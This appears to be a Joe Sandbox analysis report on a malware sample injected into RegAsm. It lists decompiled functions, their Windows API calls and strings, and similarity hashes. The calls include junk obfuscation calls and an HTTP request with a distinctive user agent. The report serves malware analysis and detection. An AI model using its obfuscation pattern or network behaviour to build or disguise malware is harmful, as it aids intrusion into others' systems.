CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_eoj7ddfd), ref: 0040E5CF
SetEnvironmentVariableA.KERNEL32(3xq32c78,4hlbz7zc), ref: 0040E5E8
CancelWaitableTimer.KERNEL32(0040A700), ref: 0040E5F2
GetLastError.KERNEL32 ref: 0040E5F8
FindFirstFileA.KERNEL32(s_1v7f4tmo,?), ref: 0040E60A
FindClose.KERNEL32(00000000), ref: 0040E611
SetEnvironmentVariableA.KERNEL32(2qerpjca,e2rrxjvp), ref: 0040E624
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C88,00000000), ref: 0040E639
CloseHandle.KERNEL32(00000000), ref: 0040E640
GetLastError.KERNEL32 ref: 0040E646
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_gqvusl3l), ref: 0040E654
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E65B
OutputDebugStringA.KERNEL32(tbpwui15w), ref: 0040E66C
LocalAlloc.KERNEL32(00000000,00000E0A), ref: 0040E674
SetEnvironmentVariableA.KERNEL32(r0k2f9ww,x7e4a2x8), ref: 0040E686
LocalFree.KERNEL32(00000000), ref: 0040E68D
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_93hrnvfl), ref: 0040E69E
OutputDebugStringA.KERNEL32(tlel70lho), ref: 0040E6AB
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E6B2
OutputDebugStringA.KERNEL32(tv7zqj1ex), ref: 0040E6C6
OutputDebugStringA.KERNEL32(t4qmwjb86), ref: 0040E6D1
CreateMutexA.KERNEL32(00000000,00000000,MTXwtb7gfab), ref: 0040E6E0
RegOpenKeyExA.ADVAPI32(80000001,regptet050g,00000000,00020019,0040A700), ref: 0040E6F9
ReleaseMutex.KERNEL32(00000000), ref: 0040E700
SetEnvironmentVariableA.KERNEL32(romsejjy,e5xfpe1y), ref: 0040E71C
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h8vyhyer), ref: 0040E747
SetEvent.KERNEL32(00000000), ref: 0040E750
ResetEvent.KERNEL32(00000000), ref: 0040E757
FindFirstFileA.KERNEL32(s_f7rbex8u,?), ref: 0040E769
FindClose.KERNEL32(00000000), ref: 0040E770
CreateMutexA.KERNEL32(00000000,00000000,MTX7li8kyt9), ref: 0040E77F
ReleaseMutex.KERNEL32(00000000), ref: 0040E78A
RegOpenKeyExA.ADVAPI32(80000001,reg05x3yssi,00000000,00020019,0040A700), ref: 0040E79E
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000CA6,00000000), ref: 0040E7B0
RegOpenKeyExA.ADVAPI32(80000001,regkb6gxpys,00000000,00020019,?), ref: 0040E7C5
CloseHandle.KERNEL32(00000000), ref: 0040E7CC
RegOpenKeyExA.ADVAPI32(80000001,regb5xnendj,00000000,00020019,?), ref: 0040E7DF
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_5b4k5ud8), ref: 0040E7EE
CancelWaitableTimer.KERNEL32(00000000), ref: 0040E7F9
LocalFree.KERNEL32(00000000), ref: 0040E820
LocalFree.KERNEL32(?), ref: 0040E830

Strings

romsejjy, xrefs: 0040E717
XML5zofh5uh, xrefs: 0040E4E0
SMPHR_ncjvn580, xrefs: 0040E4A1
t4z65gxg3, xrefs: 0040E550
WTMR_3wmy1555, xrefs: 0040E532
ev_h8vyhyer, xrefs: 0040E73C
74pnz2dv, xrefs: 0040E70B
ev_d1n9xjo7, xrefs: 0040E5A7
XMLabwc5xbh, xrefs: 0040E579
regponugcbe, xrefs: 0040E4CD
regurxbk0z1, xrefs: 0040E4D4
tlel70lho, xrefs: 0040E6A4
tv7zqj1ex, xrefs: 0040E6C1
s_f7rbex8u, xrefs: 0040E764
s_1v7f4tmo, xrefs: 0040E605
regptet050g, xrefs: 0040E6F3
WTMR_gqvusl3l, xrefs: 0040E64C
e5xfpe1y, xrefs: 0040E712
SMPHR_93hrnvfl, xrefs: 0040E693
MTXwtb7gfab, xrefs: 0040E6D7
regkb6gxpys, xrefs: 0040E7BF
reg05x3yssi, xrefs: 0040E798
ev_auaalwdo, xrefs: 0040E4F9
r0k2f9ww, xrefs: 0040E67F
4hlbz7zc, xrefs: 0040E5D5
e2rrxjvp, xrefs: 0040E61A
reg4fypal5k, xrefs: 0040E59B
x7e4a2x8, xrefs: 0040E67A
2qerpjca, xrefs: 0040E61F
WTMR_9k3bwwuv, xrefs: 0040E55B
3xq32c78, xrefs: 0040E5DD
tbpwui15w, xrefs: 0040E667
m7x7lnie, xrefs: 0040E706
MTX7li8kyt9, xrefs: 0040E776
t4qmwjb86, xrefs: 0040E6CC
regb5xnendj, xrefs: 0040E7D9
WTMR_eoj7ddfd, xrefs: 0040E5C6
WTMR_5b4k5ud8, xrefs: 0040E7E5

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventTimerWaitable$Semaphore$LocalOpenRelease$DebugOutputString$CancelCloseEnvironmentErrorFileFindFreeLastMutexVariable$Reset$AllocFirstHandleMapping
String ID: 2qerpjca$3xq32c78$4hlbz7zc$74pnz2dv$MTX7li8kyt9$MTXwtb7gfab$SMPHR_93hrnvfl$SMPHR_ncjvn580$WTMR_3wmy1555$WTMR_5b4k5ud8$WTMR_9k3bwwuv$WTMR_eoj7ddfd$WTMR_gqvusl3l$XML5zofh5uh$XMLabwc5xbh$e2rrxjvp$e5xfpe1y$ev_auaalwdo$ev_d1n9xjo7$ev_h8vyhyer$m7x7lnie$r0k2f9ww$reg05x3yssi$reg4fypal5k$regb5xnendj$regkb6gxpys$regponugcbe$regptet050g$regurxbk0z1$romsejjy$s_1v7f4tmo$s_f7rbex8u$t4qmwjb86$t4z65gxg3$tbpwui15w$tlel70lho$tv7zqj1ex$x7e4a2x8
API String ID: 1123312507-2501424013
Opcode ID: 6aff6430b03e1b7e6c0e8bdb192611bc05b7be43bb51b3e86c62198b478a16e2
Instruction ID: d4bae38c1ac0806ebe60742d17ca1736c8f2320d5270f5dde25be8e2fd7a8f4b
Opcode Fuzzy Hash: 6aff6430b03e1b7e6c0e8bdb192611bc05b7be43bb51b3e86c62198b478a16e2
Instruction Fuzzy Hash: EDA11135E81354BBD7205FA19D4EFDB3E68EB0DB52F104422F705E65E0C6B89A808B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED79 Relevance: 129.7, APIs: 46, Strings: 28, Instructions: 215
timeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
OutputDebugStringA.KERNEL32(taidzcf8e), ref: 0040EDF6
OutputDebugStringA.KERNEL32(te82qlpx1), ref: 0040EDFD
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
LocalFree.KERNEL32(00000000), ref: 0040EE5A
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
SetEvent.KERNEL32(00000000), ref: 0040EE8D
ResetEvent.KERNEL32(00000000), ref: 0040EE94
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
GetLastError.KERNEL32 ref: 0040EEAB
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EEB6
OutputDebugStringA.KERNEL32(t4mysaur5), ref: 0040EEC8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 0040EEF1
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000260,00000000), ref: 0040EF03
GetLastError.KERNEL32 ref: 0040EF0B
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EF12
FindFirstFileA.KERNEL32(s_78akpirh,?), ref: 0040EF24
FindClose.KERNEL32(00000000), ref: 0040EF2B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_c33ulp1b), ref: 0040EF3A
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF45
RegOpenKeyExA.KERNEL32(80000001,regnnoidgbh,00000000,00020019,?), ref: 0040EF60
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5ur9xojv), ref: 0040EF6D
SetEvent.KERNEL32(00000000), ref: 0040EF76
ResetEvent.KERNEL32(00000000), ref: 0040EF7D
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_28kapc83), ref: 0040EF8B
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF92
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLhgc16pbm), ref: 0040EFA1
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EFAB
OutputDebugStringA.KERNEL32(tih43o6yt), ref: 0040EFB6
OutputDebugStringA.KERNEL32(tdcs470r4), ref: 0040EFC0
LocalAlloc.KERNEL32(00000000,000000F1), ref: 0040EFCD
SetEnvironmentVariableA.KERNEL32(8hhspfe7,y8ldbn1v), ref: 0040EFE5
LocalFree.KERNEL32(00000000), ref: 0040EFE8
OutputDebugStringA.KERNEL32(t4xlw2t0n), ref: 0040EFF3
SetEnvironmentVariableA.KERNEL32(68l1qnot,pk835cg2), ref: 0040EFFF

Strings

pk835cg2, xrefs: 0040EFF5
MTX9of20kmn, xrefs: 0040EDAA
XMLk6eld4rr, xrefs: 0040EE60
t6xplss11, xrefs: 0040EDC9
ev_5ur9xojv, xrefs: 0040EF62
te82qlpx1, xrefs: 0040EDF8
WTMR_t2lry32w, xrefs: 0040ED90
8hhspfe7, xrefs: 0040EFE0
taidzcf8e, xrefs: 0040EDF1
ev_gc0upe3h, xrefs: 0040EE7B
s_78akpirh, xrefs: 0040EF1F
tih43o6yt, xrefs: 0040EFB1
WTMR_28kapc83, xrefs: 0040EF83
d1fc95c6179be4b0b4f93eff6ab3f08f, xrefs: 0040ED8A
68l1qnot, xrefs: 0040EFFA
SMPHR_7pn5tvkk, xrefs: 0040EE01
WTMR_mn0c9pqk, xrefs: 0040EE9A
WTMR_c33ulp1b, xrefs: 0040EF31
y8ldbn1v, xrefs: 0040EFDB
regou0dc9en, xrefs: 0040EE4D
regnnoidgbh, xrefs: 0040EF56
regp7r1ymid, xrefs: 0040EDE3
t4mysaur5, xrefs: 0040EEC3
regd0052drm, xrefs: 0040EE28
t3u620qk9, xrefs: 0040EEBC
t4xlw2t0n, xrefs: 0040EFEE
XMLhgc16pbm, xrefs: 0040EF98
tdcs470r4, xrefs: 0040EFBB

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$TimerWaitable$DebugOutputString$EventSemaphore$CancelLocalOpenRelease$Find$AllocCloseEnvironmentErrorFileFreeLastMutexResetVariable$ByteChangeCharFirstMappingMultiNotificationWide
String ID: 68l1qnot$8hhspfe7$MTX9of20kmn$SMPHR_7pn5tvkk$WTMR_28kapc83$WTMR_c33ulp1b$WTMR_mn0c9pqk$WTMR_t2lry32w$XMLhgc16pbm$XMLk6eld4rr$d1fc95c6179be4b0b4f93eff6ab3f08f$ev_5ur9xojv$ev_gc0upe3h$pk835cg2$regd0052drm$regnnoidgbh$regou0dc9en$regp7r1ymid$s_78akpirh$t3u620qk9$t4mysaur5$t4xlw2t0n$t6xplss11$taidzcf8e$tdcs470r4$te82qlpx1$tih43o6yt$y8ldbn1v
API String ID: 1683889909-2333090999
Opcode ID: 21a305686ee079c1fcd256b2c1bc3c758b65bb888e22eeb740056fdffb4e445b
Instruction ID: 580180a41c01fb162bce7c08d2167115d5501e97d870e7efc00abc2bd202d83f
Opcode Fuzzy Hash: 21a305686ee079c1fcd256b2c1bc3c758b65bb888e22eeb740056fdffb4e445b
Instruction Fuzzy Hash: 1261A331E81254BBD7206BA19C4DFDF3F68EF8DB91F114062F705A65E0CAB849C086AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF5D Relevance: 121.1, APIs: 49, Strings: 20, Instructions: 383
networktimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,0000C350,771C4B60,00000000,771A9350,?,?), ref: 0040AF78
lstrlenW.KERNEL32(?), ref: 0040B042
lstrlenW.KERNEL32(?), ref: 0040B049
LocalFree.KERNEL32(?), ref: 0040B067
InternetOpenW.WININET(MrBidenNeverKnow,00000000,00000000,00000000,00000000), ref: 0040B0CE
InternetConnectW.WININET(00000000,?,00000000,00000000,00000000,00000003,00000000,00000001), ref: 0040B0F0
HttpOpenRequestW.WININET(00000000,?,00000000,00000000,?,00400000,00000001), ref: 0040B12B
HttpSendRequestW.WININET(00000000,00000000,00000000), ref: 0040B15B
LocalAlloc.KERNEL32(00000000,00000C10), ref: 0040B16C
SetEnvironmentVariableA.KERNEL32(ort9hkq1,b12x9vew), ref: 0040B17E
LocalFree.KERNEL32(00000000), ref: 0040B185
RegOpenKeyExA.ADVAPI32(80000001,regp8tb0054,00000000,00020019,00000073), ref: 0040B1A0
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLvotntp4p), ref: 0040B1B1
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040B1BC
OutputDebugStringA.KERNEL32(tswncgxtb), ref: 0040B1CD
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C7C,00000000), ref: 0040B1DD
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040B1E4
GetLastError.KERNEL32 ref: 0040B1EA
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rgj27qnx), ref: 0040B1F9
CancelWaitableTimer.KERNEL32(00000000), ref: 0040B200
OutputDebugStringA.KERNEL32(t0dqltc27), ref: 0040B20B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_yii8umeo), ref: 0040B216
CancelWaitableTimer.KERNEL32(00000000), ref: 0040B221
RegOpenKeyExA.ADVAPI32(80000001,reg0kv5a3vl,00000000,00020019,?), ref: 0040B23C
GetLastError.KERNEL32 ref: 0040B244
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_ark30ypg), ref: 0040B255
SetEvent.KERNEL32(00000000), ref: 0040B25E
ResetEvent.KERNEL32(00000000), ref: 0040B265
InternetReadFile.WININET(00000000,00000000,0000C350,?), ref: 0040B289
InternetCloseHandle.WININET(00000000), ref: 0040B290
InternetCloseHandle.WININET(?), ref: 0040B29C
InternetCloseHandle.WININET(00000000), ref: 0040B2A3
LocalAlloc.KERNEL32(00000000,00000833), ref: 0040B2B0
SetEnvironmentVariableA.KERNEL32(f145t4tc,omgq2nzb), ref: 0040B2C8
LocalFree.KERNEL32(00000000), ref: 0040B2CB
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rl53dosl), ref: 0040B2DA
SetEnvironmentVariableA.KERNEL32(ro9h4ava,40da1v7y), ref: 0040B2EC
CancelWaitableTimer.KERNEL32(00000000), ref: 0040B2F3
RegOpenKeyExA.ADVAPI32(80000001,regvkrmlxvn,00000000,00020019,?), ref: 0040B30E
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLzziqpor8), ref: 0040B31F
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040B32A
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_k42qply2), ref: 0040B33B
SetEvent.KERNEL32(00000000), ref: 0040B344
ResetEvent.KERNEL32(00000000), ref: 0040B34B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040B36D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 0040B3A5
LocalFree.KERNEL32(?), ref: 0040B3B9
LocalFree.KERNEL32(?), ref: 0040B3C2
LocalFree.KERNELBASE(00000000), ref: 0040B3C9

Strings

f145t4tc, xrefs: 0040B2C3
omgq2nzb, xrefs: 0040B2BE
ev_k42qply2, xrefs: 0040B330
tswncgxtb, xrefs: 0040B1C8
WTMR_yii8umeo, xrefs: 0040B20D
s, xrefs: 0040B0FF
regp8tb0054, xrefs: 0040B196
40da1v7y, xrefs: 0040B2E0
XMLvotntp4p, xrefs: 0040B1A6
WTMR_rgj27qnx, xrefs: 0040B1F0
MrBidenNeverKnow, xrefs: 0040B0C9
reg0kv5a3vl, xrefs: 0040B232
b12x9vew, xrefs: 0040B172
ro9h4ava, xrefs: 0040B2E5
regvkrmlxvn, xrefs: 0040B304
t0dqltc27, xrefs: 0040B206
ort9hkq1, xrefs: 0040B177
WTMR_rl53dosl, xrefs: 0040B2D1
XMLzziqpor8, xrefs: 0040B314
ev_ark30ypg, xrefs: 0040B24A

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Create$EventFreeInternetTimerWaitable$Open$CloseSemaphore$AllocCancelEnvironmentHandleVariable$ByteCharDebugErrorFileHttpLastMultiOutputReleaseRequestResetStringWidelstrlen$ChangeConnectFindMappingNotificationReadSend
String ID: 40da1v7y$MrBidenNeverKnow$WTMR_rgj27qnx$WTMR_rl53dosl$WTMR_yii8umeo$XMLvotntp4p$XMLzziqpor8$b12x9vew$ev_ark30ypg$ev_k42qply2$f145t4tc$omgq2nzb$ort9hkq1$reg0kv5a3vl$regp8tb0054$regvkrmlxvn$ro9h4ava$s$t0dqltc27$tswncgxtb
API String ID: 1022627459-3553686633
Opcode ID: 14ee274e78c0766a4cd5864c7accac75dcf6b01dfd21713871be93aec12028cd
Instruction ID: aabe3de674458c1b7cd9436828d8e41c641cc014c7d9d3ac54ea3e037c4b33dd
Opcode Fuzzy Hash: 14ee274e78c0766a4cd5864c7accac75dcf6b01dfd21713871be93aec12028cd
Instruction Fuzzy Hash: 5BD15075A40215FFEB109BA4DC49FEE7BB4EB48701F108026FA05B72E0D7B859418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4F1 Relevance: 114.0, APIs: 39, Strings: 26, Instructions: 200
synchronizationregistrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ctoy85uy), ref: 0040F508
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F512
GetLastError.KERNEL32 ref: 0040F51C
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_w1v6gq3f), ref: 0040F52B
SetEvent.KERNEL32(00000000), ref: 0040F534
ResetEvent.KERNEL32(00000000), ref: 0040F53B
CreateMutexA.KERNEL32(00000000,00000000,MTXjac2h9rp), ref: 0040F548
OutputDebugStringA.KERNEL32(tumyok3ra), ref: 0040F55F
ReleaseMutex.KERNEL32(00000000), ref: 0040F562
SetEnvironmentVariableA.KERNEL32(megabt3k,y9hcww4j), ref: 0040F572
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000673,00000000), ref: 0040F58A
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040F593
LocalAlloc.KERNEL32(00000000,00000E13), ref: 0040F59C
LocalFree.KERNEL32(00000000), ref: 0040F5A3
FindFirstFileA.KERNEL32(s_ji847msw,?), ref: 0040F5B5
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000973,00000000), ref: 0040F5E8
OutputDebugStringA.KERNEL32(tsvokt7xn), ref: 0040F5F1
CloseHandle.KERNEL32(00000000), ref: 0040F5F4
SetEnvironmentVariableA.KERNEL32(fxvrzngo,9h1ax6df), ref: 0040F606
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iadc4qpr), ref: 0040F611
SetEnvironmentVariableA.KERNEL32(stgaai7d,b73laros), ref: 0040F623
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F62A
OutputDebugStringA.KERNEL32(tqx0oz2ay), ref: 0040F63C
CreateMutexA.KERNEL32(00000000,00000000,MTXuwyp0mzf), ref: 0040F647
ReleaseMutex.KERNEL32(00000000), ref: 0040F652
OutputDebugStringA.KERNEL32(tzrixxlap), ref: 0040F65F
OutputDebugStringA.KERNEL32(th0zjxe72), ref: 0040F666
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_apuc3cyk), ref: 0040F671
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F67B
OutputDebugStringA.KERNEL32(tdv2ywoqz), ref: 0040F68A
SetEnvironmentVariableA.KERNEL32(gwixf5pi,f757up8d), ref: 0040F698
FindFirstFileA.KERNEL32(s_f8ads0ue,?), ref: 0040F6A6
FindClose.KERNEL32(00000000), ref: 0040F6AD
LocalAlloc.KERNEL32(00000000,00000B22), ref: 0040F6B9
RegOpenKeyExA.ADVAPI32(80000001,regag1solu3,00000000,00020019,?), ref: 0040F6DD
LocalFree.KERNEL32(00000000), ref: 0040F6E0
RegOpenKeyExA.ADVAPI32(80000001,regzaymxyte,00000000,00020019,?), ref: 0040F6F8
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_uhthxy03), ref: 0040F702
RegQueryValueExW.KERNEL32(?,00000000,00000001,?,00000104), ref: 0040F742

Strings

y9hcww4j, xrefs: 0040F568
tzrixxlap, xrefs: 0040F65A
s_ji847msw, xrefs: 0040F5B0
t5qdz6127, xrefs: 0040F630
fxvrzngo, xrefs: 0040F601
WTMR_uhthxy03, xrefs: 0040F6FA
stgaai7d, xrefs: 0040F61C
tsvokt7xn, xrefs: 0040F5EA
regzaymxyte, xrefs: 0040F6F2
MTXuwyp0mzf, xrefs: 0040F63E
tumyok3ra, xrefs: 0040F55A
ev_w1v6gq3f, xrefs: 0040F522
th0zjxe72, xrefs: 0040F661
megabt3k, xrefs: 0040F56D
9h1ax6df, xrefs: 0040F5FC
gwixf5pi, xrefs: 0040F693
b73laros, xrefs: 0040F617
tdv2ywoqz, xrefs: 0040F685
SMPHR_apuc3cyk, xrefs: 0040F668
WTMR_iadc4qpr, xrefs: 0040F608
regag1solu3, xrefs: 0040F6D7
SMPHR_ctoy85uy, xrefs: 0040F4FD
MTXjac2h9rp, xrefs: 0040F541
f757up8d, xrefs: 0040F68E
tqx0oz2ay, xrefs: 0040F637
s_f8ads0ue, xrefs: 0040F6A1

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$DebugOutputString$EnvironmentFileFindLocalMutexReleaseSemaphoreVariable$CloseEventTimerWaitable$AllocFirstFreeMappingOpen$CancelChangeErrorHandleLastNotificationQueryResetValue
String ID: 9h1ax6df$MTXjac2h9rp$MTXuwyp0mzf$SMPHR_apuc3cyk$SMPHR_ctoy85uy$WTMR_iadc4qpr$WTMR_uhthxy03$b73laros$ev_w1v6gq3f$f757up8d$fxvrzngo$gwixf5pi$megabt3k$regag1solu3$regzaymxyte$s_f8ads0ue$s_ji847msw$stgaai7d$t5qdz6127$tdv2ywoqz$th0zjxe72$tqx0oz2ay$tsvokt7xn$tumyok3ra$tzrixxlap$y9hcww4j
API String ID: 613056492-3819321733
Opcode ID: 8ee59bd8b346564f920efe36f4d1ca2b80084bbecf4d62136ef6df6ad897b689
Instruction ID: 6483b53d7b41781449c88bfde164218c53f2c738c47ea40cad8e95de9368aef3
Opcode Fuzzy Hash: 8ee59bd8b346564f920efe36f4d1ca2b80084bbecf4d62136ef6df6ad897b689
Instruction Fuzzy Hash: CE518371A40354BBD7206BA19C4DFEB3E7DEBC9B51F104036F705A25E1CAB849818A7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F012 Relevance: 105.2, APIs: 40, Strings: 20, Instructions: 181
synchronizationtimememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B
GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217
LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
GlobalFree.KERNEL32(?), ref: 0040F22C

Strings

regwog66qaw, xrefs: 0040F20D
SMPHR_qjkqlbwl, xrefs: 0040F192
MTXdxglk35i, xrefs: 0040F1E9
mjtppkej, xrefs: 0040F10F
XMLamfolgz0, xrefs: 0040F1CD
jcezxitk, xrefs: 0040F1BD
t1v6z4di9, xrefs: 0040F1E2
WTMR_b67hznar, xrefs: 0040F128
t7fwgbo5x, xrefs: 0040F146
s_t4ckbkwe, xrefs: 0040F180
WTMR_pg3esy2g, xrefs: 0040F096
kswx2kex, xrefs: 0040F0FA
87xo3fjd, xrefs: 0040F0F5
tv49i65z7, xrefs: 0040F172
54dhluqg, xrefs: 0040F10A
t26t01mzg, xrefs: 0040F0B1
b4j4f6xx, xrefs: 0040F1C2
